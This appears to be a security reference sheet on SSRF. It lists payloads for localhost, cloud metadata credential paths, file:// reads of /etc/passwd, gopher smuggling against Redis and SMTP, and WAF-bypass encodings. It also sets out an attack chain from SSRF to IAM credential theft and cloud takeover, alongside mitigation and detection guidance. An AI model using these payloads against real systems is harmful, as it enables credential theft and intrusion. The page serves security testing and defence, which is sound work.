Critical Severity | OWASP A10:2021
๐ด Server-Side Request Forgery (SSRF)
๐ง Description
What is SSRF?
Server-Side Request Forgery (SSRF) allows an attacker to make the server perform requests on their behalf. Unlike CSRF (which targets the victim to perform actions), SSRF involves the vulnerable server making requests to internal services or external systems.
SSRF allows attackers to:
- Access internal services (localhost, private networks)
- Exploit cloud metadata services (AWS, GCP, Azure)
- Port scanning internal infrastructure
- Read internal files via file:// protocol
- Attack internal services (Redis, MongoDB, etc.)
- Bypass firewall restrictions
๐ท๏ธ Classification
- Vulnerability Type: Server-Side Request Forgery (CWE-918)
- OWASP: A10:2021 - Server-Side Request Forgery
- Attack Types:
- Basic SSRF - Response visible to attacker
- Blind SSRF - No response, only side effects
- Semi-blind SSRF - Limited response data
๐ฏ Attack Surface
- โ URL Parameters: preview, url, src, dest, redirect, uri, path
- โ API Endpoints: /fetch, /load, /get, /render
- โ File Processing: PDF generation, image processing
- โ Webhooks: Callback URLs, notification URLs
- โ Proxy Services: URL shorteners, proxy gateways
- โ API Integrations: Social media, payment callbacks
โ ๏ธ Preconditions
- Application fetches URLs based on user input
- No proper validation of the URL target
- Server can make outbound connections
- No allowlist or proper restrictions on URL schemes
๐ Detection
Basic Payloads for Testing:
http://localhost/http://127.0.0.1/http://169.254.169.254/(AWS metadata)
Tools:
- Burp Suite: Manual testing with Intruder
- SSRFmap: Automated SSRF testing
- groundsel: SSRF fuzzer
๐ง Burp Suite Workflow
- Identify URL-fetching functionality
- Send request to Repeater
- Replace URL with internal targets
- Check response for data leakage
- If blind, use out-of-band detection
- Escalate to cloud metadata or internal services
โ๏ธ Tool Automation
๐ซ SSRFmap
Automatic SSRF exploitation
๐ก๏ธ Burp Suite
Manual testing
โก Gitscan
GitHub SSRF scanner
# SSRFmap python ssrfmap.py -r request.txt -p url # nuclei nuclei -u "http://target.com" -t templates/ssrf.yaml
๐ฃ Basic Payloads
๐งช Internal Access
http://localhost/
http://127.0.0.1/
http://0.0.0.0/
http://[::1]/
๐ Cloud Metadata
http://169.254.169.254/latest/meta-data/
http://metadata.google.internal/computeMetadata/v1/
http://169.254.169.254/metadata/v1/
๐ Advanced Payloads
โ๏ธ AWS Payloads
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/user-data/
http://169.254.169.254/latest/dynamic/instance-identity/document
๐ File Protocol
file:///etc/passwd
file:///var/www/html/config.php
file:///proc/self/environ
๐ง Protocol Smuggling
dict://localhost:11211/stats
gopher://127.0.0.1:6379/_INFO
sftp://localhost:22/
๐ค AI-Generated Payloads
AWS Lambda: http://169.254.169.254/2018-06-01/runtime/invocation/
Kubernetes: http://kubernetes.default.svc/
๐จ Context-Aware Payloads
๐ก๏ธ WAF Bypass
http://127.1/
http://127.127.127.127/
http://2130706433/ (Decimal)
http://[::ffff:127.0.0.1]/
๐ Proof of Concept
# Target: https://target.com/url?url=https://example.com # Payload: https://target.com/url?url=http://169.254.169.254/latest/meta-data/ # Response reveals AWS credentials!
๐จ Request / Response
GET /fetch?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1 Host: target.com HTTP/1.1 200 OK ami-id instance-id instance-type ...
๐ฅ Impact Analysis
Severity: CRITICAL (CVSS 10.0)
- Full cloud account compromise via metadata
- Access to internal services and databases
- Port scanning and network mapping
- Remote code execution in many cases
โก Advanced Exploitation
1. Gopher Protocol for Redis:
gopher://127.0.0.1:6379/_CONFIG GET *
2. SMTP via Gopher:
gopher://127.0.0.1:25/_MAIL FROM:<attacker@attacker.com>
๐ Attack Chains
Chain 1: SSRF to Cloud Takeover
- Find URL-fetching parameter
- Access AWS metadata service
- Steal IAM credentials
- Create new IAM user with admin access
โ Test Cases
| ID | Test | Payload | Expected |
|---|---|---|---|
| 1 | Localhost | http://127.0.0.1 | Internal response |
| 2 | AWS Metadata | http://169.254.169.254/... | AWS data |
| 3 | File Read | file:///etc/passwd | File content |
๐ก๏ธ Mitigation
โ
URL Validation: Use allowlist for URLs
โ Disable Unnecessary Protocols: Disable file://, gopher://, etc.
โ Cloud Metadata Protection: Disable metadata API from instance
โ Network Segmentation: Limit outbound access from server
โ Disable Unnecessary Protocols: Disable file://, gopher://, etc.
โ Cloud Metadata Protection: Disable metadata API from instance
โ Network Segmentation: Limit outbound access from server
๐ฐ Advanced Mitigation
# AWS - Disable IMDS
aws ec2 modify-instance-metadata-options \
--instance-id i-1234567890abcdef0 \
--http-endpoint disabled
Use URL parsing libraries to validate URL components, implement request timeout limits, log and monitor all outgoing requests.
๐ Monitoring & Detection
- Alert on requests to 169.254.169.254 (metadata)
- Monitor for internal IP addresses in requests
- Log all URL-fetching operations
- Alert on unusual outbound connections
๐ Security Controls
| Control | Implementation |
|---|---|
| Allowlist | Only allow specific domains |
| Protocol Restriction | Disable file://, gopher:// |
| Cloud Hardening | Disable metadata API |
| Network Controls | Restrict outbound traffic |
๐ Bypass Techniques
http://127.1/ (Short form)
http://2130706433/ (Decimal)
http://[::1]/ (IPv6)
localhost.@domain.com (DNS hijacking)
๐ ๏ธ Tools & Commands
SSRFmap
ssrfmap -r request.txt
Burp Collaborator
Out-of-band detection
๐ References
๐ Retest Steps
| Step | Action |
|---|---|
| 1 | Implement allowlist |
| 2 | Re-test with localhost |
| 3 | Re-test with cloud metadata |
| 4 | Disable metadata API |
โ๏ธ Detection Logic
- Static: Check for URL-fetching without validation
- Dynamic: Fuzz URL parameters with internal targets
๐ Threat-Hunting Notes
IOCs: Requests to 169.254.x.x, file:// protocol, internal IPs
๐ก๏ธ Defensive Detection Ideas
Deploy WAF with SSRF rules, implement network monitoring for unusual outbound connections.